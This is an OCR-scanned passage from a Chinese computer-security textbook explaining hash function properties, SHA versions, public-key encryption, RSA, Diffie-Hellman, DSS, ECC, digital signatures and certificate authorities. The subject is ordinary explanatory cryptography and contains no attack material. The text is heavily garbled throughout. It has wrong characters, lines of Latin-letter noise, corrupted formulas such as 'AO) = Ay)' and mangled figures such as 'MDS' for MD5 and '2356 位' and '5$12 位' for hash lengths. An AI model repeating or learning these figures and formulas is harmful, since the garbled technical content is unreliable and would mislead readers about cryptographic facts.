了 一 种 称 为 HMAC 的 机 制 ， 这 种 机 制 比 图 2-5c 描述 的 方法 要 复杂 一 些 ， 并 已 成 为 带 密 钥 散 列 
MAC 的 标准 方法 。 


2.2.3 安全 散 列 函数 


单 呵 散 列 函数 或 者 安全 散 列 清 数 不 仅 在 消息 认证 中 而 且 在 数字 签名 中 都 是 很 重要 的 。 在 这 
一 小 节 ， 首 先 讨论 对 安全 散 列 函数 的 要 求 ， 然 后 讨论 具体 算法 。 

对 散 列 函数 的 要 求 ” 散 列 函 数 的 目的 就 是 要 产生 文件 、 消 息 或 其 他 数据 块 的 “指纹 ”。 一 
个 散 列 函数 五 要 能 够 用 于 消息 认证 ， 它 必须 具有 下 列 性 质 : 

1. 石 可 应 用 于 任意 大 小 的 数据 块 。 

2. 玉 产生 固定 长 度 的 输出 。 

3. 对 任意 给 定 的 x， 计 算 A(x) 比较 容易 ， 用 硬件 和 软件 均 可 实现 。 

4. 对 任意 给 定 的 散 列 码头 ， 找 到 满足 玉 (x)==h 的 x 在 计算 上 是 不 可 行 的 。 具 有 这 种 性 质 的 
散 列 函数 被 称 为 是 单 向 (one-way) 的 或 抗原 象 (preimage resistant) °F). 

5. 对 任意 给 定 的 分 组 x， 找 到 满足 y 关 x 有 目 HOSH 的 > 在 计算 上 是 不 可 行 的 , 具有 这 
种 性 质 的 散 列 函数 被 称 为 是 第 二 抗原 象 ( second preimage resistant) 的 , 有 时 也 被 称 为 是 弱 抗 础 
## (weak collision resistant) 的 。 

6. 找到 任何 满足 AO) = Ay) 的 偶 对 (x,y) 在 计算 上 是 不 可 行 的 。 具 有 这 种 性 质 的 散 列 
pki AUUE PK ON Ze Hh BULGE (collision resistant) AY. A AY tH Be PK A oR Hr LS (strong collision 
resistant) 的 。 

前 三 个 性 质 是 散 列 函数 实际 应 用 于 消息 认证 中 所 必须 满足 的 。 

第 四 个 性 质 是 单 加 性 ， 即 由 消息 很 容易 计算 出 散 列 码 ， 但 是 由 散 列 码 却 不 能 计算 出 相应 的 
消息 。 对 于 使 用 一 个 秘密 值 的 认证 方法 ( 见 图 2-5c) 这 个 性 质 非 常 重 要 ， 虽 然 该 秘密 值 本 身 并 不 


日 表示 连接 。 
O 对 于 /f(x)=y,， 称 x 为 y 的 原 象 ,除非 f 是 一 对 一 的 ,否则 对 于 给 定 的 y 将 有 多 个 原 象 值 。 
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传送 ， 但 者 散 列 函数 不 是 单间 的 ， 则 攻击 者 可 以 很 容易 地 找到 这 个 秘密 值 ， 知 攻击 者 能 够 观 
察 或 者 截获 传送 的 消息 ， 则 他 可 以 得 到 消息 M 和 散 列 码 MDw 二 H(KIIMIIK)。 然 后 求 出 散 列 函 
数 的 逆 ， 从 而 得 出 KIMIIK=H7(MDwm)。 由 于 攻击 者 已 知 M 和 KIIMIIK， 所 以 可 恢复 出 K。 

第 五 条 性 质 可 以 保证 不 能 找到 与 给 定 消息 具有 相同 散 列 值 的 男 一 个 消息 ， 因 此 它 可 以 在 对 
散 列 码 加 密 的 方法 中 防止 伪造 ( 见 图 2-5a 和 b)。 如 果 这 条 性 质 不 成 立 ， 那 么 攻击 者 可 以 先 观 
察 或 截获 一 条 消息 及 其 加 密 的 散 列 码 ， 然 后 由 消息 产生 一 个 未 加 密 的 散 列 码 ， 最 后 产生 男 一 个 
具有 相同 散 列 码 的 消息 。 

一 个 散 列 函数 告 满足 上 面 所 列 出 的 前 五 条 性 质 则 称 其 为 弱 散 列 函 数 。 如 果 第 六 条 性 质 也 
满足 ， 则 称 其 为 强 散 列 函数 。 强 散 列 盟 数 能 阻止 一 个 实体 伪造 另 一 个 实体 已 经 签名 的 信息 。 例 
如 ， 假 设 Bob 写 一 个 IOU 消息 ， 发 送 给 Alice，Alice 对 该 消息 进行 了 签名 。 如 果 Bob 发 现 两 
个 消息 具有 相同 的 散 列 值 ， 其 中 一 个 要 求 Alice 付 少量 的 钱 ， 另 一 个 要 求 她 付 大 量 的 钱 。Alice 
签名 了 第 一 条 信息 ， 那 么 Bob 就 认为 第 二 条 消息 也 是 可 信 的 。 

除了 提供 认证 功能 以 外 ， 消 息 摘要 还 能 提供 数据 完整 性 。 它 执行 与 帧 检验 序列 相同 的 功能 : 
如 果 消 息 中 的 某 些 位 在 传输 过 程 中 侦 然 发 生 了 改变 ， 那么 接收 到 的 消息 摘要 将 会 是 错误 的 。 

散 列 函数 的 安全 性 ”和 对 称 加 密 一 样 ， 对 安全 散 列 函数 的 攻击 也 有 两 类 : 密码 分 析 和 蛮 力 
攻击 。 和 对 称 加 密 算法 一 样 ， 散 列 消 数 的 密码 分 析 也 涉及 利用 该 算法 中 人 逻辑 上 的 弱 点 。 

散 列 函数 抗 蛮 力 攻击 的 能 力 仅 仅 依 赖 于 算法 所 产生 的 散 列 码 的 长 度 。 对 于 长 度 为 n 的 散 列 
码 ， 所 需 的 代价 与 下 表 中 的 相应 量 成 正比 。 


抗原 象 
第 二 抗原 象 
抗 碰撞 gu 


如 果 要 求 抗 碰撞 能 力 (通常 期 望 安全 散 列 码 具 有 该 性 质 )， 那 么 值 2 决定 了 该 散 列 码 的 抗 
蛮 力 攻击 的 强度 。Oorschot 和 Wiener[ VANO94] 耗资 1000 万 美元 ， 为 攻击 MDS 设计 了 一 台 碰 
撞 搜 索 器 ， 它 能 在 24 天 内 找到 一 个 碰撞 。MDS5 使 用 的 是 128 位 的 散 列 码 ， 因 此 一 般 认 为 128 
位 散 列 码 是 不 够 的 。 如 果 将 散 列 码 看 作 以 32 位 为 单位 的 序列 ， 那 么 以 后 将 要 使 用 160 位 散 列 
码 。 对 160 位 的 散 列 码 ， 用 相同 的 搜索 器 则 需要 4000 年 才能 找到 一 个 碰撞 。 利 用 今天 的 技术 
可 能 需要 的 时 间 更 短 ， 因 此 160 位 已 经 是 不 可 信和 的 了 。 

安全 散 列 函数 算法 ”在 最 近 几 年 里 ， 安 全 散 列 算法 (Secure Hash Algorithm, SHA) 已 成 
为 使 用 最 广泛 的 散 列 算法 。SHA 由 NIST 设计 并 于 1993 年 作为 联邦 信息 处 理 标准 (FIPS 180 ) 
发 布 。 当 SHA 的 缺点 被 发 现 后 ， 修 订 版 于 1995 年 发 布 (FIPS 180-1 )， 通常 称 之 为 SHA-1。 
SHA-1 产生 160 位 的 散 列 值 。2002 年 NIST 提出 了 该 标准 的 修订 版 (FIPS 180-2 )， 它 定义 
了 三 种 新 的 SHA 版 本 ， 散 列 值 的 长 度 分 别 为 2356 位 、384 位 和 5$12 位 ， 分 别称 为 SHA-256、 
SHA-384 和 SHA-512。 这 些 新 的 版 本 统称 为 SHA-2， 它 们 与 SHA-1 具有 相同 的 基本 结构 ， 并 
使 用 了 相同 类 型 的 模 运 算 和 逻辑 二 元 运算 。 特 别 是 512 位 的 SHA-2 版 本 ,似乎 具有 牢 不 可 破 
的 安全 性 。 然 而 ， 鉴 于 SHA-2 与 SHA-1 两 者 结构 的 相似 性 ，NIST 决定 标准 化 一 种 与 SHA-2 
和 SHA-1 截然 不 同 的 新 的 散 列 男 数 。 这 种 被 称 为 SHA-3 的 新 散 列 函数 发 布 于 2012 Æ, mHE. 
现在 已 经 作为 SHA-2 的 替代 品 而 被 广泛 运用 。 


2.2.4 散 列 函数 的 其 他 应 用 


前 面 讨 论 了 散 列 函数 在 消息 认证 和 创建 数字 签名 中 的 应 用 〈 本 章 稍 后 将 对 后 者 进行 更 为 详 
细 的 讨论 )。 下 面 给 出 安全 散 列 函数 应 用 的 另外 两 个 例子 。 
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e 口令 : 第 3 章 介 绍 了 一 种 机 制 ， 即 操作 系统 中 存储 的 是 口令 的 散 列 值 而 不 是 口令 本 身 。 
因此 ， 能 访问 口令 文件 的 黑客 不 能 获得 有 效 的 口令 。 简 单 地 说 ， 当 用 户 输入 口令 时 ， 
口令 的 散 列 值 要 与 存储 在 系统 中 的 散 列 值 进行 匹配 。 这 个 应 用 要 求 抗原 象 性 ， 或 许 还 
要 求 第 二 抗原 象 性 。 

© 入 侵 检 测 : 在 一 个 系统 中 为 每 个 文件 存储 并 保护 好 散 列 值 HCF) (例如 存储 在 一 个 受 保 
护 的 CD-R 上 )。 你 可 以 通过 重新 计算 ACP) 来 确定 文件 是 否 被 修改 了 。 入 侵 者 可 能 会 
改变 ,但 不 能 改变 HF)。 这 个 应 用 要 求 弱 第 二 抗原 象 性 。 


2.3 AAWE 
公 钥 加 密 与 对 称 加 密 同 等 重要 ， 它 应 用 于 消息 认证 和 密 钥 分 发 中 。 


2.3.1 公 钥 加 密 的 结构 


1976 年 ，Diffie 和 Hellman[DIFF76] 首次 提出 了 公 钥 加 密 的 思想 ， 这 是 有 文字 记载 的 几 千 
年 来 密码 领域 第 一 次 真正 革命 性 的 进步 。 公 钥 算 法 基于 数学 函数 ， 而 不 像 对 称 加 密 算法 那样 是 
基于 位 模式 的 简单 操作 。 更 重要 的 是 ， 公 钥 密 码 是 非 对称 的 (asymmetric)， 它 使 用 两 个 单独 的 
密 钥 。 而 对 称 加 密 只 使 用 一 个 密 钥 。 使 用 两 个 密 钥 对 于 机 密 性 、 密 钥 分 发 和 认证 都 产生 了 意义 
深 远 的 影响 。 

在 继续 进行 讨论 之 前 ， 我们 首先 简单 解释 一 下 有 关公 和 钥 密 码 的 几 种 常见 误解 。 一 种 误解 
是 ， 从 密码 分 析 的 角度 看 ， 公 钥 密 码 比 对 称 密码 更 安全 。 而 事实 上， 任何 加 密 方法 的 安全 性 都 
依赖 于 密 钥 的 长 度 和 破译 密码 所 需要 的 计算 量 。 从 抗 密码 分 析 的 角度 看 ， 原 则 上 不 能 说 对 称 密 
码 优 于 公 钥 密码 ， 也 不 能 说 公 钥 密码 优 于 对 称 密码 。 第 二 种 误解 是 公 钥 密码 是 一 种 通用 的 方 
法 ， 所 以 对 称 密码 已 经 过 时 了 。 其 实 正 好 相反 ， 由 于 当前 的 公 钥 密码 所 需 的 计算 量 过 大 ， 因 而 
取缔 对 称 密码 似乎 不 太 可 能 。 最 后 ， 有 一 种 误解 是 ， 对 称 密码 中 与 密 钥 分 发 中 心 的 握手 是 一 件 
异常 麻烦 的 事情 ， 与 之 相 比 ， 利 用 公 饥 密码 实现 密 钥 分 发 则 非常 简单 。 事实 上 ,使 用 公 钥 密码 
也 需要 有 茶 种 形式 的 协议 ， 该 协议 通常 包含 一 个 中 心 代 理 ， 并 且 其 所 包含 的 处 理 过 程 既 不 比 对 称 
密码 需要 的 步骤 少 ， 也 不 更 有 效 。 

公 钥 密码 体制 有 6 个 组 成 部 分 ( 见 图 2-6a): 

e 明文 (plaintext): 算法 的 输入 ， 是 可 读 信 息 或 数据 。 

© MAE (encryption algorithm): 加 密 算 法 对 明文 进行 各 种 变换 。 

e 公 钥 和 私 钥 (public and private key): 这 是 选 出 的 一 对 密 钥 ， 这 对 密 钥 中 一 个 用 于 加 密 ， 

另 一 个 用 于 解密 。 加 密 算法 执行 的 变换 依赖 于 公 铀 和 私 钥 9。 

e ZX (ciphertext): 算法 的 输出 ， 其 依赖 于 明文 和 密 钥 。 对 于 给 定 的 消息 ， 不 同 的 密 钥 

产生 的 密 文 不 同 。 

© 解密 算法 (decryption algorithm); 该 算法 接收 密 文 和 相应 的 密 钥 ， 并 产生 原始 明文 。 

正如 其 字面 上 的 意思 ， 公 钥 对 其 他 使 用 者 来 说 是 公共 的 。 然 而 私 钥 只 有 它 的 拥有 者 知道 。 
一 般 的 公 钥 加 密 算 法 依赖 于 一 个 加 密 密 钥 和 一 个 与 之 不 同 但 又 相关 的 解密 密 钥 。 

1. 每 个 用 户 产生 一 对 密 钥 ， 用 来 加 密 和 解密 消息 。 


日 ”应 用 于 对 称 加 密 的 密 钥 一 般 称 为 秘密 密 钥 (secret key)。 应 用 于 公 钥 加 密 的 两 个 密 钥 称 为 公 钥 (public key) 


和 私 钥 (private key) 。 私 钥 依然 需要 保持 其 秘密 性 ， 但 是 为 了 避免 与 对 称 加 密 混 清 ， 称 其 为 私 钥 而 非 秘密 
密 钥 。 
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2. 每 个 用 户 将 其 中 一 个 密 钥 放 在 公共 寄存 器 或 其 他 可 访问 的 文件 中 ， 该 密 钥 称 为 公 钥 ， 另 
一 个 密 钥 则 是 私有 的 。 如 图 2-6a 所 示 ， 每 个 用 户 可 以 拥有 奎 干 其 他 用 户 的 公 钠 。 

3. Æ Bob 要 发 送 消息 给 Alice， 则 Bob 用 Alice 的 公 钥 加 密 。 

4. Alice 收 到 消息 后 ， 用 其 私 钥 对 消息 解密 。 由 于 只 有 Alice 知道 其 自身 的 私 铀 ， 所 以 其 他 
的 接收 者 均 不 能 解密 出 消息 。 

利用 这 种 方法 ， 通 信 各 方 均 可 访问 公 钥 ， 而 私 钥 是 各 通信 方 在 本 地 产生 的 ， 所 以 不 必 进 
行 分 发 。 只 要 系统 控制 了 其 私 铀 ， 那 么 它 的 通信 就 是 安全 的 。 在 任何 时 刻 ， 系 统 可 以 改变 其 私 
钥 ， 并 公布 相应 的 公 钥 以 代替 原来 的 公 甸 。 

图 2-6b 描述 了 另 一 种 公 钥 加 密 的 操作 模式 。 在 这 种 机 制 中 ， 用 户 通 过 上 自己 的 私 钥 加 密 数 
据 。 只 有 知道 相关 的 公 钥 的 人 才能 对 该 数据 进行 解密 。 
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传输 的 密 文 
Y=E[PU,,X] 











明文 输入 
加 密 算 法 ( 如 RSA ) 


Bob 
a) 公 钥 加 密 


b) 私 钥 加 密 
图 2-6 公 和 钥 密 码 体 制 
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请 注意 图 2-6a 所 描述 的 方案 ， 它 是 为 了 提供 机 密 性 : 只 有 期 望 的 接收 者 才能 对 密 文 进行 
解密 ， 因 为 只 有 期 望 的 接收 者 拥有 所 要 求 的 私 钥 。 事 实 上 机 密 性 依赖 于 许多 方面 的 因素 ， 包 括 
算法 的 安全 性 、 私 钥 的 保密 性 以 及 任何 包含 加 密 函 数 的 协议 的 安全 性 。 

图 2-6b 所 描述 的 方案 是 为 了 提供 认证 和 数据 完整 性 。 如 果 一 个 用 户 能 成 功 地 利用 Bob 的 
公 钥 将 Bob 的 密 文 还 原 为 明文 ， 这 表明 只 有 Bob 对 明文 进行 了 加 密 ， 以 此 提供 了 认证 。 更 进 
一 步 地 讲 ， 只 有 Bob 能 对 明文 进行 修改 ， 因 为 只 有 他 能 利用 自己 的 私 钥 对 明文 进行 加 密 。 需 
要 再 次 指出 的 是 ， 其 实际 提供 的 认证 或 数据 完整 性 依赖 于 多 种 因素 。 这 些 问 题 主 要 在 第 21 章 
进行 介绍 ， 但 是 本 书 其 他 地 方 也 会 有 所 涉及 。 


2.3.2 ” 公 钥 密码 体制 的 应 用 


在 继续 进行 讨论 之 前 ， 我 们 首先 必须 澄清 公 钥 密码 体制 中 容易 引起 混淆 的 一 个 问题 。 公 针 
密码 体制 的 特点 是 使 用 具有 两 个 密 钥 的 密码 算法 ， 其 中 一 个 密 钥 是 私有 的 ， 另 一 个 是 公有 的 。 
根据 不 同 的 应 用 ， 发 送 方 可 使 用 其 私 钥 或 者 接收 方 的 公 钥 或 同时 使 用 两 者 来 实现 密码 功能 。 一 
般 来 讲 ， 可 以 把 公 钥 密码 体制 的 应 用 划分 为 三 类 : 数字 签名 、 对 称 密 钥 分 发 和 秘密 密 钥 加 密 。 

这 些 应 用 将 在 2.4 节 进行 讨论 ， 有 些 算法 可 用 于 上 述 三 种 应 用 ， 而 有 些 算法 则 只 适用 其 中 
一 种 或 两 种 应 用 。 表 2-3 列 出 了 本 节 讨 论 的 算法 及 其 所 支持 的 应 用 。 

R23 ” 公 铀 密码 体制 的 应 用 


算 法 数字 签名 对 称 密 钥 分 发 秘密 密 钥 加 密 


DSS 
椭圆 曲线 


fim | OX | OA | A 


2.3.3 ”对 公 钥 密码 的 要 求 


图 2-6 所 示 的 密码 体制 建立 在 基于 两 个 相关 密 钥 的 密码 算法 之 上 。Diffie 和 Hellman 假设 
这 一 密码 体制 是 存在 的 ， 但 没有 证 明 这 种 算法 的 存在 性 。 不 过 他 们 给 出 了 这 些 算法 应 满足 的 条 
件 [DIFF76b] : 

1. B 产生 一 对 密 钥 (AH PU;， 私 钥 PR) 在 计算 上 是 容易 的 。 

2. 已 知 公 钥 和 要 加 密 的 消息 M， 发 送 方 A 产生 相应 的 密 文 在 计算 上 是 容易 实现 的 : 

C=E(PU,, M) 
3. 接收 方 B 使 用 其 私 钥 对 接收 的 密 文 解密 以 恢复 明文 在 计算 上 是 容易 实现 的 : 
M=D(PR,, C)=D{[PR,, E(PU;, M)] 

4. 已 知 公 钥 PU 时， 攻击 者 要 确定 私 钥 PR, 在 计算 上 是 不 可 行 的 。 

$. 已 知 公 钥 PU, 和 密 文 C， 攻 击 者 要 恢复 明文 M 在 计算 上 是 不 可 行 的 。 

还 可 以 增加 一 个 条 件 一 一 尽管 它 很 有 和 用， 但 并 不 是 所 有 的 公 钥 密码 应 用 都 必须 满足 该 条 件 。 

6. 加 密 和 解密 函数 的 顺序 可 以 交换 : 

M=D([PU,, E(PR,, M)|=D[PR,, E(PU,, M)] 


2.3.4 非 对 称 加 密 算 法 


在 本 小 节 中 ， 我 们 只 是 简单 地 介绍 一 下 使 用 最 广泛 的 非 对 称 加 密 算法 。 第 21 章 将 给 出 其 
ERAT o 
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RSA MIT 的 Ron Rivest, Adi Shamir 和 Len Adleman 在 1977 年 提出 了 第 一 个 公 钥 体制 
RSA, FF 1978 年 首次 发 表 该 算法 [RIVE78]。RSA 被 认为 是 使 用 最 广泛 并 被 实现 的 公 钥 加 密 
方法 。RSA 体制 是 一 种 分 组 密码 ， 其 明文 和 密 文 均 是 0 ~ n 一 1 之 间 的 整数 。 

1977 Æ, RSA 的 三 位 发 明 者 发 动 《科学 美国 人 》 杂 志 的 读者 对 他 们 发 表 在 Martin Gardner 
的 《数学 游戏 》 专 栏 中 的 密 文 进 行 解密 。 解 得 明文 则 可 获得 100 美元 的 奖金 。 他 们 预言 需要 
4X10 “年 才能 解 得 明文 。 但 是 ， 一 个 研究 小 组 利用 连接 到 Internet 上 的 1600 多 台 计 算 机 ， 只 
用 了 8 个 月 时 间 ， 于 1994 年 4 月 解决 了 这 个 问题 [LEUT94]。 这 里 所 用 的 公 钥 的 大 小 (nn 的 长 
BE) 是 129 位 十 进 制 数 ， 即 约 428 位 二 进 制 数 。 这 个 结果 并 没有 让 RSA 的 使 用 变 得 无 效 ， 它 
仅仅 意味 着 应 该 采用 长 度 更 大 的 密 钥 。 实 际 上 ， 对 于 所 有 应 用 来 说 ，1024 位 的 密 钥 长 度 (RKA 
300 位 十 进 制 数 ) 足够 了 。 

Diffie-Hellman #4At#iX Diffie Al Hellman 在 一 篇 具有 独创 意义 的 论文 中 首次 提出 了 公 
钥 算法 ， 给 出 了 公 钥 密码 学 的 定义 [DIFF76]， 该 算法 被 称 为 Diffie-Hellman 密 钥 交换 或 密 钥 协 
议 。 许 多 商业 产品 都 使 用 了 这 种 密 钥 交换 技术 。 

该 算法 的 目的 是 使 两 个 用 户 能 安全 地 交换 密 钥 ， 以 便 在 后 续 的 通信 中 用 该 密 钥 对 消息 加 
密 。 该 算法 本 身 只 限于 进行 密 钥 交 换 。 

数字 签名 标准 ”美国 国家 标准 与 技术 研究 所 (NIST) 发布 的 联邦 信息 处 理 标准 FIPS PUB 
186， 被 称 为 数字 签名 标准 (Digital Signature Standard, DSS). DSS 使 用 SHA-1 算法 给 出 了 一 
种 新 的 数字 签名 方法 ， 即 数字 签名 算法 (DSA). DSA 最 初 提出 于 1991 年 ，1993 年 根据 公众 
对 其 安全 性 的 反馈 意见 对 它 进行 了 一 些 修 改 。 在 1998 年 、2000 年 、2009 年 又 更 新 发 布 了 不 同 
版 本 ， 最 近 的 版 本 是 2013 年 发 布 的 FIPS PUB 186-4。DSS 使 用 的 是 只 提供 数字 签名 功能 的 算 
法 。 与 RSA 不 同 ， 它 不 能 用 于 加 密 和 密 钥 分 发 。 

椭圆 曲线 密码 学 ”大 多 数 使 用 公 钥 密码 学 和 数字 签名 的 产品 和 标准 都 使 用 RSA BIE. A 
了 保证 RSA 的 使 用 安全 性 ， 最 近 这 些 年 来 密 钥 的 位 数 一 直 在 增加 ， 这 对 使 用 RSA 的 应 用 是 很 
重 的 负担 ， 对 于 进行 大 量 安全 交易 的 电子 商务 更 是 如 此 。 最 近 ， 一 种 具有 强大 竞争 力 的 椭圆 
曲线 密码 学 ( Elliptic Curve Cryptography, ECC) 对 RSA 提出 了 挑战 。 在 标准 化 的 过 程 中 ， 
如 关于 公 钥 密码 学 的 IEEE (电气 和 电子 工程 师 学 会 ) P1363 标准 中 ， 人 们 也 已 考虑 了 ECC, 

与 RSA 相 比 ，ECC 的 主要 诱 人 之 处 在 于 ， 它 可 以 使 用 比 RSA 短 得 多 的 密 钥 得 到 相同 的 安 
全 性 ， 因 此 其 可 以 减轻 处 理 负荷 。 男 一 方面 ， 虽然 关 于 ECC 的 理论 已 很 成 熟 ， 但 直到 最 近 才 
出 现 这 方面 的 产品 。 对 于 ECC 的 密码 分 析 也 刚刚 起 步 ， 因 此 ECC 的 可 信和 度 还 没有 RSA 高 。 


24 数字 签名 和 密 钥 管理 


正如 在 2.3 节 中 介绍 的 ， 公 钥 密 码 算 法 在 许多 领域 得 到 了 应 用 。 从 广义 上 讲 ， 这 些 应 用 可 
以 分 为 两 类 : 数字 签名 ， 与 密 钥 管理 和 分 发 相关 的 一 些 技 术 。 

针对 密 钥 管理 与 分 发 ， 至少 有 三 个 不 同方 面 使 用 公 钥 加 密 : 

© 安全 地 分 发 公共 密 钥 ; 

© 使 用 公 钥 加 密 分 发 密 钥 ; 

e 使 用 公 钥 加 密 为 消息 加 密 创 建 临 时 密 钥 。 

本 节 对 数字 签名 和 各 种 类 型 的 密 钥 管 理 与 分 发 进行 简单 的 介绍 。 


24.1 数字 签名 


公 钥 加 密 是 一 种 可 以 用 作 身 份 认 证 的 技术 ， 比 如 数字 签名 。FIPS PUB 186 (数字 签名 标准 ， 
2013 年 7 月 ) 定义 了 一 种 具有 下 述 特 点 的 数字 签名 : 数据 的 加 密 转 换 的 结果 (如 果 得 到 适当 实 
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施 ) 能 够 提供 一 个 机 制 来 保证 原始 认证 、 数 据 完 整 性 以 及 签名 的 不 可 抵赖 性 。 

因此 ， 数 字 签 名 是 依赖 于 数据 的 位 组 合格 式 ， 由 代理 根据 文件 、 消 息 或 其 他 形式 的 数据 块 
生成 。 另 一 个 代理 人 将 获取 数据 块 及 其 对 应 的 签名 以 证 实 : (1 ) 数据 块 被 签名 者 签名 ; (2 ) 数 
据 块 在 被 签名 后 没有 改变 。 除 此 之 外 ， 签 名 者 不 能 否认 签名 。 

FIPS 186-4 指定 了 以 下 三 种 数字 签名 算法 : 

数字 签名 算法 (Digital Signature Algorithm, DSA): NIST 最 初 批准 的 算法 ， 基 于 计算 离散 
对 数 的 复杂 性 。 

RSA 数字 签名 算法 : 基于 RSA 公 钥 加 密 算 法 。 

椭圆 曲线 数字 签名 算法 (ECDSA): 基于 椭圆 曲线 密码 。 

图 2-7 是 一 个 制作 、 使 用 数字 签名 过 程 的 通用 模型 。 所 有 FIPS 186-4 中 的 数字 签名 方案 
都 拥有 这 个 结构 。 假 设 Bob 要 将 一 条 消息 发 送 给 Alice。 尽 管 消息 并 不 重要 ， 也 无 须 保密 ， 
但 他 想 让 Alice 知道 消息 确实 是 他 发 的 。 出 于 这 个 目的 ，Bob 利用 一 个 安全 的 散 列 函数 ， 如 
SHA-512， 产 生 消 息 的 散 列 值 ， 然 后 将 这 个 散 列 值 用 他 的 私 钥 加 密 ， 从 而 就 创建 了 数字 签名 
( Digital Signature), Bob 将 附带 着 签名 的 消息 发 送出 去 。 当 Alice 收 到 市 有 签名 的 消息 后 ， 她 
要 做 的 是 : (1) 计算 该 消息 的 散 列 值 ; (2 ) 利用 Bob 的 公 钥 对 签名 进行 解密 ; (3 ) 将 计算 出 
的 散 列 值 和 解密 出 的 散 列 值 做 比较 。 如 果 这 两 个 散 列 值 相等 ，Alice WERE MAU ATW Bl ATA Be 
由 Bob 签名 过 的 。 因 为 其 他 人 没有 Bob 的 私 钥 ， 所 以 他 们 便 不 能 创建 能 用 Bob 的 公 钥 解密 的 
密 文 。 另 外 ， 没 有 Bob 的 私 钥 想 对 消息 做 修改 也 是 不 可 能 的 ， 因 此 ， 消 息 在 来 源 方面 和 数据 
完整 性 方面 都 得 到 了 认证 。 


Bob 的 
Af 





返回 签名 
Bob 对 消息 是 否 有 效 
M 的 签名 
a) Bob 对 消息 签名 b) Alice 验证 签名 


图 2-7 数字 签名 过 程 中 基本 要 素 的 简化 描述 
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FERIA LE, tha, ARTA AA ABU AERD A EXT 
分 消息 进行 签名 的 情况 下 是 明显 的 ， 因 为 其 他 的 消息 均 以 明文 形式 进行 传输 。 即 使 在 完全 加 密 
的 情况 下 ， 也 不 能 保证 机 密 性 ， 因 为 任何 观察 者 均 可 以 利用 发 送 者 的 公 钥 对 消息 进行 解密 。 
2.4.2 ASME 

从 字面 上 理解 ， 公 和 钥 加 密 的 意思 就 是 公 钥 是 公开 的 。 所 以 ， 如 果 有 某 种 广泛 接受 的 公 钥 算 
法 ， 如 RSA， 任何 参 与 者 均 可 以 将 其 公 钥 发 送 给 其 他 参与 者 或 者 把 这 个 公 和 钥 广 播 到 整个 团体 。 
尽管 这 种 方法 使 用 起 来 很 方便 ， 但 是 它 有 一 个 很 大 的 缺陷 ， 即 任何 人 都 可 以 伪造 该 公共 通告 。 
也 就 是 说 ， 某 个 用 户 可 以 假冒 用 户 Bob 向 其 他 参与 者 发 送 公 钥 或 广播 公 钥 ， 直 到 一 段 时 间 后 
FAP Bob 发 觉 伪造 并 告知 其 他 参与 者 ， 伪 造 者 在 此 之 前 可 以 读 取 和 欲 发 送 给 Bob 的 加 密 消息 ， 
并 且 可 以 使 用 伪造 的 密 钥 进行 认证 。 

解决 这 个 问题 的 方法 是 公 角 证书。 实际 上 ， 公 钥 证 书 由 公 钥 加 上 公 钥 所 有 者 的 用 户 ID 以 
及 可 信 第 三 方 签名 的 整个 数据 块 组 成 。 证 书 也 包括 一 些 关 于 第 三 方 的 信息 以 及 证 书 有 效 期 限 的 
标识 。 通 常 ， 第 三 方 就 是 用 户 团 体 所 信任 的 认证 中 心 ( Certificate Authority，CA)， 如 政府 机 构 
或 金融 机 构 。 用 户 可 以 通过 安全 渠道 将 自己 的 公 钥 提交 给 该 中 心 并 获得 签名 证 书 。 用 户 之 后 可 
以 发 布 该 证 书 ， 任 何 需要 该 用 户 公 钥 的 人 都 可 以 获取 这 个 证 书 ， 并 通过 附带 的 可 信 签 名 来 验证 
其 有 效 性 。 图 2-8 描述 了 这 个 过 程 。 














未 签名 的 证 书 Bob 的 

(包括 用 户 ID、 | | DAR 生成 不 包括 签名 的 

用 户 公 钥 以 及 eie 
— : 


CA 信息 


是 否 有 效 
生成 未 签名 签名 的 证 书 
证 书 的 散 列 码 A 

用 CA 的 私 钥 加 密 散 用 CA 的 公 钥 解密 

列 码 以 构成 签名 签名 以 恢复 散 列 码 
ss ee Se ee 

创建 签名 利用 证 书 来 
的 数字 证 书 验证 Bob 的 公 钥 
图 2-8 ” 公 和 钥 证 书 的 使 用 
这 些 关 键 的 步骤 总 结 如 下 。 


1. 用 户 软 件 (客户 端 ) 创建 一 对 密 钥 : 一 个 公 钥 和 一 个 私 钥 。 
2. 客户 端 准备 一 个 包含 用 户 ID 和 公 和 钥 的 未 签名 的 证 书 。 
3. 用 户 通 过 某 种 安全 手段 将 未 签名 的 证 书 提交 给 CA。 这 种 手段 可 能 是 面对面 的 会 谈 ， 也 
可 能 是 使 用 已 注册 的 电子 邮件 ， 或 提交 一 个 电子 邮件 认证 的 Web 表单 。 
4. CA 以 如 下 方式 产生 一 个 签名 : 
a. CA 利用 某 个 散 列 函数 计算 出 未 签名 证 书 的 散 列 码 。 该 散 列 函数 ， 例 如 将 在 2.2 A 
21.1 节 中 讨论 的 SHA 困 数 族 ， 将 一 个 可 变 长 度 的 数据 分 组 或 消息 映射 到 一 个 固定 长 度 
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散 列 码 。 
b. CA 使 用 自己 的 私 钥 和 数字 签名 算法 来 生成 数字 签名 。 
5. CA 将 签名 附属 在 未 签名 的 证 书后 ， 以 此 创建 一 个 签名 证 书 。 
6. CA 将 签名 证 书 交 还 给 客户 端 。 
7. 客户 端 可 以 将 该 签名 证 书 提交 给 其 他 用 户 。 
8. 该 签名 证 书 的 任何 接收 者 可 以 通过 以 下 方法 验证 该 证 书 的 有 效 性 : 
a. 接收 者 计算 证 书 的 散 列 码 (不 包括 签名 )。 
b. 接收 者 使 用 CA 的 公 钥 和 签名 认证 算法 来 证 实数 字 签 名 。 这 个 算法 返回 值 显示 签名 是 
否 有 效 。 
X.509 标准 已 经 被 广泛 接受 ， 用 来 格式 化 公 钥 证 书 。X.509 证 书 应 用 在 许多 网 络 安全 领域 ， 
包括 IP 安全 (IPSec)、 传 输 层 安全 (TLS)、 安 全 Shell (SSH) 和 安全 /多 用 途 Internet 邮件 扩展 
(S/MIME)。 本 书 的 第 五 部 分 将 讨论 上 述 大 部 分 应 用 。 


2.4.3 利用 公 钥 加 密实 现 对 称 密 钥 交换 

利用 对 称 加 密 ， 两 个 通信 实体 进行 安全 通信 的 一 个 基本 要 求 是 它们 共享 一 个 秘密 密 钥 。 假 
设 Bob 想 创 建 一 个 消息 通信 应 用 ， 使 他 能 与 任何 接 人 Internet 的 用 户 或 接 人 与 他 共享 的 其 他 网 
络 的 用 户 安全 地 交换 电子 邮件 。 假 设 Bob 想 利 用 对 称 加 密 来 实现 。 利 用 对 称 加 密 ，Bob 和 他 
的 通信 者 (比如 Alice) 必须 提出 一 种 共享 一 个 唯一 的 私 钥 且 使 其 不 能 被 他 人 获得 的 方法 。 他 
